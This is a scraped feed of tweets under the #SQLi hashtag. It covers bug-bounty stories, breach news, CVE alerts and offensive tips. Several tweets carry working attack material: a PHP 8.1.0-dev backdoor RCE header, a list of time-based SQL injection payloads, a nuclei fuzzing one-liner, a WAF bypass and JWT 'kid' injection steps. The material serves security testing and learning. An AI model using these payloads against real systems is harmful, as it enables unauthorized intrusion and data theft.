Explore tweets tagged as #SQLi
@IamMatteoBisi
Matteo Bisi
39 seconds
MITRE's 2025 CWE Top 25: XSS #1, SQLi #2 from 39k CVEs. Missing auth rises; memory bugs persist. Prioritize input validation & CI/CD scans for cloud-native. Full post: https://t.co/jRFuRUovbx #CWE #MITRE #DevSecOps #Cybersecurity
0
0
0
@viehgroup
VIEH Group
29 days
If you find PHP 8.1.0-dev then try RCE & SQLi User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id'); #bugbounty #bugbountytips #rce #sqli
2
43
242
@h4x0r_fr34k
VAIDIK PANDYA
24 days
Post 16/30 : Quick SQLi OneLiner SQL Injection One-Liner waybackurls target[.]com | grep '=' | sort -u | nuclei -t ../fuzzing-templates/sqli -dast Working: This fetches all URLs with query parameters for the target domain using waybackurls, filters unique parameterized
5
45
338
@_SaxX_
SaxX ¯\_(ツ)_/¯
29 days
🚨🔴CYBERALERT 🇫🇷FRANCE🔴 | Eurofiber hit by a cyberattack: 3,600+ customers affected, including SNCF, AXA, ... ⤵️ On 13 November 2025, Eurofiber France suffered a massive cyberattack. The highly seasoned cybercriminal group ByteToBreach exploited a vulnerability (SQLi)
25
211
436
@Icko_GZ
Icko
6 days
Fortinet #WAF #bypass for SQLi ----------------------------------- I recently came across an SQLi blocked by a Fortinet WAF, and all my initial attempts to bypass it via encoding were unsuccessful. I was finally able to bypass it by simply appending more than 1K of junk.
5
19
148
@awais0x1
Awais Nazeer
22 days
I reported 2 SQLi bugs to an @intigriti public program, all accepted and fixed. Found 3 more. Submitted one, triager confirmed it, but the company still marked it “internal duplicate” with zero proof. Now I’m keeping the other two to myself, no point feeding them free fixes 😂
9
2
98
@HunterMapping
Hunter
1 day
🚨Alert🚨 CVE-2025-61675 & CVE-2025-61678 & CVE-2025-66039: Critical SQLi, File-Upload, and AUTHTYPE Bypass Flaws in FreePBX Could Lead to RCE. -------------------- CVE-2025-61675: An authenticated SQL injection vulnerability CVE-2025-61678: An authenticated arbitrary file upload
0
18
97
@5hady_
Shady
15 days
Today’s SQLi done ✅ Quick tip: Always dig into the main domain, not just the subdomains. You’ll be surprised how much everyone else overlooks. #BugBounty #BugBountyLife #EthicalHacking #CyberSecurity #InfoSec #SQLi #WebSecurity #KeepHacking
6
3
136
@fattselimi
Fat
1 month
hello sqli my old friend ^_^
12
6
209
@iYousefAlotaibi
Yousef
22 days
Let’s keep our country safe. Four types of SQLi in a single shot is crazy 😅
1
1
13
@malekmesdour
ryuku
26 days
I found an SQLi on the main app and I was able to execute any SQL function. They “fixed” it in two days and downgraded it to High, saying it was “read-only”💀 Anyway, below is how I bypassed the WAF using parameter pollution #BugBounty #bugbountytips
13
33
448
@zack0x01
zack0x01
14 days
Hey #bugbounty hunters 👋 just got rewarded 5,000💲 on a self-hosted program for a SQLi vulnerability 😉 #Hacking #cybersecurity #EthicalHacking #infosec
18
12
414
@slonser_
slonser
23 days
Today I discovered an SQLi vulnerability in a PostgreSQL application where the injection point was path-based with a strict length restriction (32 chars). Spaces, slashes, quotes, parentheses, etc. resulted in a 400 Bad Request error and the path wasn't URL-decoded
2
30
264
@ingliguori
Giuliano Liguori
14 hours
Huge thanks to the author for this clean, no-nonsense infographic breaking down the six most common cyber attacks: Phishing, MitM, DDoS, SQLi, Zero-Day, and XSS — all in one place with crystal-clear visuals. Perfect for anyone teaching, learning, or just starting in InfoSec, or
3
2
4
@_sqli_
⚝⋆
31 minutes
0
0
1
@Sqli03
sayli🇧🇪ⵣ🇲🇦
13 days
Wallah, I'm in tears 😭 we can close out 2025 on this video straight from Belgium 🇧🇪
94
506
4K
@intigriti
Intigriti
22 days
Found a target that actively uses the 'kid' JWT header parameter? Make sure to test for injection attacks, such as SQLi! 🤠 Here's how: 1. Decode the header 2. Inject your SQLi payload into the 'kid' parameter 3. Modify the JWT claims (payload) 4. Sign your JWT using your
8
28
242
@HackingTeam777
ӉѦСҠіИԌ ҬЄѦӍ
25 days
SQLi Payloads XOR(if(now()=sysdate(),sleep(7),0))XOR%23 'or sleep(7)--# 'or sleep(7)# 'or sleep(7)='# 'or sleep(7)='-- '/*F*/or/*F*/sleep(7)=' 'or sleep(7)--%23 'or sleep(7)%23 'or sleep(7);%00 or sleep(7)--+- or sleep(7)# '/*f*/or/*f*/sleep/*f*/(7)--#
6
90
433
@BourAbdelhadi
Bour Abdelhadi
23 days
You can try the Suggest Attack Vectors feature in rep+. Add your Anthropic key and get quick ideas (IDOR, SQLi, weird params) right in the browser. I also used Bulk Replay to test without leaving DevTools. PS: Always understand what you’re doing. Never trust the LLM blindly.
6
23
153